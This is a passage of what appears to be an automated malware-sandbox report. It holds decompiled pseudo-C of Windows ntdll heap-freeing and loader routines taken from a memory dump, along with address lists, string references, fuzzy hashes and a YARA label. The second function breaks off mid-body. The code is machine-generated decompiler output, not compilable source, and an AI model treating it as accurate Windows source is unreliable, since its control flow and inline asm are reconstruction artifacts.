						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E01BEFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E01BFA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E01B8D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E01B3B150();
										} else {
											E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1c26378 = 1;
											asm("int3");
											 *0x1c26378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E01B5A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								L01B5A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E01B5BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E01BFA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E01B5A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								L01B5A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E01B8D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E01B3B150();
								} else {
									E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1c26378 = 1;
									asm("int3");
									 *0x1c26378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E01BEFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E01BFA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E01B8D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E01B3B150();
													} else {
														E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1c26378 = 1;
														asm("int3");
														 *0x1c26378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E01B5A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										L01B5A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E01B5BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E01BFA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E01B8D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E01B3B150();
													} else {
														E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E01B3B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1c26378 = 1;
														asm("int3");
														 *0x1c26378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E01B5A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										L01B5A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E01B5BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E01B5BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x01b599ca
0x01b599cc
0x01b599df
0x01b599e3
0x01b599f8
0x01b599fb
0x01b599fb
0x00000000
0x01b59a48
0x01b59a48
0x01b59a4c
0x01b59a51
0x01b59a55
0x01b59a61
0x01b59a66
0x01b59a68
0x01ba1457
0x01ba145c
0x01ba145c
0x01b59a68
0x01b59a6e
0x01b59a71
0x01b59a74
0x01b59a76
0x01ba1466
0x01ba1469
0x01ba1469
0x01ba146c
0x01ba146e
0x01ba1471
0x01ba1474
0x01ba1477
0x01ba1479
0x01ba159c
0x01ba159c
0x01ba159d
0x01ba15a6
0x01ba15ab
0x01ba15ab
0x00000000
0x01ba15ab
0x01ba147f
0x01ba1481
0x00000000
0x00000000
0x01ba148a
0x01ba148d
0x01ba1493
0x01ba1495
0x01ba14c0
0x01ba14c0
0x01ba14c3
0x01ba14c6
0x01ba14c8
0x01ba14cb
0x01ba14cf
0x01ba14f2
0x01ba14f2
0x01ba14f5
0x01ba14f8
0x01ba1501
0x01ba1508
0x01ba150b
0x01ba150e
0x01ba1510
0x01ba1513
0x01ba1515
0x01ba1515
0x01ba1518
0x01ba1518
0x01ba1513
0x01ba1521
0x01ba1525
0x01ba152a
0x01ba152d
0x01ba1530
0x01ba1532
0x01ba1539
0x01ba153d
0x01ba155d
0x01ba1562
0x01ba153f
0x01ba1555
0x01ba155a
0x01ba1570
0x01ba1577
0x01ba157c
0x01ba1582
0x01ba1585
0x01ba1589
0x01ba158b
0x01ba1592
0x01ba1593
0x01ba1593
0x01ba1589
0x01ba1530
0x00000000
0x01ba14f8
0x01ba14d5
0x01ba14da
0x01ba14dc
0x00000000
0x01ba14de
0x01ba14e8
0x00000000
0x01ba14e8
0x01ba1497
0x01ba1497
0x01ba14a4
0x01ba14a4
0x01ba14a7
0x01ba14a9
0x01ba14ab
0x01ba14ab
0x01ba149c
0x01ba149e
0x01ba14a0
0x01ba14b0
0x01ba14b0
0x00000000
0x01ba14a2
0x01ba14a2
0x00000000
0x01ba14a2
0x01ba14a0
0x01ba14b3
0x01ba14bb
0x00000000
0x01ba14bb
0x01ba1495
0x01b59a7c
0x01b59a7c
0x01b59a7f
0x01b59a7f
0x01b59a82
0x01b59a84
0x01b59a87
0x01b59a8a
0x01b59a8d
0x01b59a8f
0x01ba166a
0x01ba166a
0x01ba166b
0x01ba1674
0x00000000
0x01ba1674
0x01b59a95
0x01b59a97
0x00000000
0x00000000
0x01b59aa0
0x01b59aa3
0x01b59aa9
0x01b59aab
0x01b59ad7
0x01b59ad7
0x01b59ada
0x01b59add
0x01b59adf
0x01b59ae2
0x01b59ae6
0x01b59b22
0x01b59b27
0x01b59b29
0x00000000
0x01b59b2b
0x01ba15be
0x00000000
0x01ba15be
0x01b59b29
0x01b59ae8
0x01b59ae8
0x01b59aeb
0x01b59aee
0x01ba15cb
0x01ba15d2
0x01ba15d5
0x01ba15d7
0x01ba15da
0x01ba15dc
0x01ba15dc
0x01ba15dc
0x01ba15da
0x01ba15e5
0x01ba15e9
0x01ba15ee
0x01ba15f1
0x01ba15f3
0x01ba15f9
0x01ba1600
0x01ba1604
0x01ba1624
0x01ba1629
0x01ba1606
0x01ba161c
0x01ba1621
0x01ba1637
0x01ba163e
0x01ba1643
0x01ba1649
0x01ba164c
0x01ba1650
0x01ba1656
0x01ba165d
0x01ba165e
0x01ba165e
0x01ba1650
0x01ba15f3
0x01b59af4
0x01b59af7
0x01b59afc
0x01b59b00
0x01b59b04
0x01b59b08
0x01b59b14
0x01b599fe
0x01b59a04
0x01b59a07
0x00000000
0x01b59a29
0x01ba169c
0x01ba16a0
0x01ba16a5
0x01ba16a9
0x01ba16b5
0x01ba16ba
0x01ba16bc
0x01ba16be
0x01ba16c3
0x01ba16c3
0x01ba16bc
0x01ba16c8
0x01ba16cc
0x01ba181b
0x01ba181b
0x01ba181e
0x01ba181e
0x01ba1821
0x01ba1823
0x01ba1826
0x01ba1829
0x01ba182c
0x01ba182e
0x01ba1688
0x01ba1688
0x01ba1689
0x01ba168b
0x01ba168c
0x01ba168d
0x01ba168f
0x01ba1692
0x00000000
0x01ba1692
0x01ba1834
0x01ba1836
0x00000000
0x00000000
0x01ba183f
0x01ba1842
0x01ba1848
0x01ba184a
0x01ba1875
0x01ba1875
0x01ba1878
0x01ba187b
0x01ba187d
0x01ba1880
0x01ba1884
0x01ba18a7
0x01ba18a7
0x01ba18aa
0x01ba18ad
0x01ba18b6
0x01ba18bd
0x01ba18c0
0x01ba18c3
0x01ba18c5
0x01ba18c8
0x01ba18ca
0x01ba18ca
0x01ba18cd
0x01ba18cd
0x01ba18c8
0x01ba18d5
0x01ba18da
0x01ba18df
0x01ba18e2
0x01ba18e5
0x01ba18e7
0x01ba18ee
0x01ba18f2
0x01ba1912
0x01ba1917
0x01ba18f4
0x01ba190a
0x01ba190f
0x01ba1925
0x01ba192c
0x01ba1931
0x01ba193a
0x01ba193e
0x01ba1940
0x01ba1947
0x01ba1948
0x01ba1948
0x01ba193e
0x01ba18e5
0x01ba194f
0x01ba1952
0x01ba1956
0x01ba195d
0x01ba1961
0x01ba196d
0x00000000
0x01ba196d
0x01ba188a
0x01ba188f
0x01ba1891
0x00000000
0x00000000
0x01ba189d
0x00000000
0x01ba189d
0x01ba184c
0x01ba1859
0x01ba1859
0x01ba185c
0x00000000
0x00000000
0x01ba1851
0x01ba1853
0x01ba1855
0x01ba1865
0x01ba1865
0x01ba1866
0x01ba1868
0x01ba1870
0x00000000
0x01ba1870
0x01ba1857
0x01ba1857
0x01ba185e
0x00000000
0x01ba16d2
0x01ba16d2
0x01ba16d5
0x01ba16d5
0x01ba16d8
0x01ba16da
0x01ba16dd
0x01ba16e0
0x01ba16e3
0x01ba16e5
0x01ba1808
0x01ba1808
0x01ba1809
0x01ba1812
0x01ba1817
0x01ba1817
0x00000000
0x01ba1817
0x01ba16eb
0x01ba16ed
0x00000000
0x00000000
0x01ba16f6
0x01ba16f9
0x01ba16ff
0x01ba1701
0x01ba172c
0x01ba172c
0x01ba172f
0x01ba1732
0x01ba1734
0x01ba1737
0x01ba173b
0x01ba175e
0x01ba175e
0x01ba1761
0x01ba1764
0x01ba176d
0x01ba1774
0x01ba1777
0x01ba177a
0x01ba177c
0x01ba177f
0x01ba1781
0x01ba1781
0x01ba1784
0x01ba1784
0x01ba177f
0x01ba178c
0x01ba1791
0x01ba1796
0x01ba1799
0x01ba179c
0x01ba179e
0x01ba17a5
0x01ba17a9
0x01ba17c9
0x01ba17ce
0x01ba17ab
0x01ba17c1
0x01ba17c6
0x01ba17dc
0x01ba17e3
0x01ba17e8
0x01ba17ee
0x01ba17f1
0x01ba17f5
0x01ba17f7
0x01ba17fe
0x01ba17ff
0x01ba17ff
0x01ba17f5
0x01ba179c
0x00000000
0x01ba1764
0x01ba1741
0x01ba1746
0x01ba1748
0x00000000
0x00000000
0x01ba1754
0x00000000
0x01ba1754
0x01ba1703
0x01ba1710
0x01ba1710
0x01ba1713
0x00000000
0x00000000
0x01ba1708
0x01ba170a
0x01ba170c
0x01ba171c
0x01ba171c
0x01ba171d
0x01ba171f
0x01ba1727
0x00000000
0x01ba1727
0x01ba170e
0x01ba170e
0x01ba1715
0x00000000
0x01ba1715
0x01ba16cc
0x01b59a45
0x01b59a45
0x01b59a0e
0x01b59a1c
0x01b59a23
0x01ba167e
0x01ba167f
0x01ba1681
0x01ba1683
0x01ba1684
0x00000000
0x01ba1684
0x00000000
0x01b59aad
0x01b59aad
0x01b59ab0
0x01b59ab3
0x01b59ab3
0x01b59ab6
0x00000000
0x00000000
0x01b59ab8
0x01b59aba
0x01b59abc
0x01b59ac8
0x01b59ac8
0x00000000
0x01b59abe
0x01b59abe
0x01b59ac0
0x00000000
0x01b59ac0
0x01b59abc
0x01b59ad2
0x00000000
0x01b59ad2
0x01b59aab

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01BA1572, 01BA1639, 01BA17DE, 01BA1927
HEAP[%wZ]: , xrefs: 01BA1550, 01BA1617, 01BA17BC, 01BA1905
HEAP: , xrefs: 01BA155D, 01BA1624, 01BA17C9, 01BA1912

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 47dbe0ca61e5c2fb63e8a07a3769f476855b7e24731a6146bb8e0eb7e7d95f37
Instruction ID: 60d8282cd62def4db91948a64b9f4f1011af5c4036a651e754a85e6adc47a28f
Opcode Fuzzy Hash: 47dbe0ca61e5c2fb63e8a07a3769f476855b7e24731a6146bb8e0eb7e7d95f37
Instruction Fuzzy Hash: F722F2706042429FEB6DCF2DC485B7ABBB5EF44704F5885EAE8868B346E771D881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01B48794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01B48794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E01B4934A() != 0) {
								_t159 = E01BBA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1c25780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01BB5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1c25780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E01B4849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01B48999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01B48999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1c25c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1c25c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01B52280(_t92, 0x1c286cc);
															_t94 = E01C09DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E01B661A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1c25c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01B48A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1c25c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1c25c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E01B7F380(_t136, 0x1b11184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01B52280(_t108, 0x1c286cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E01B661A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
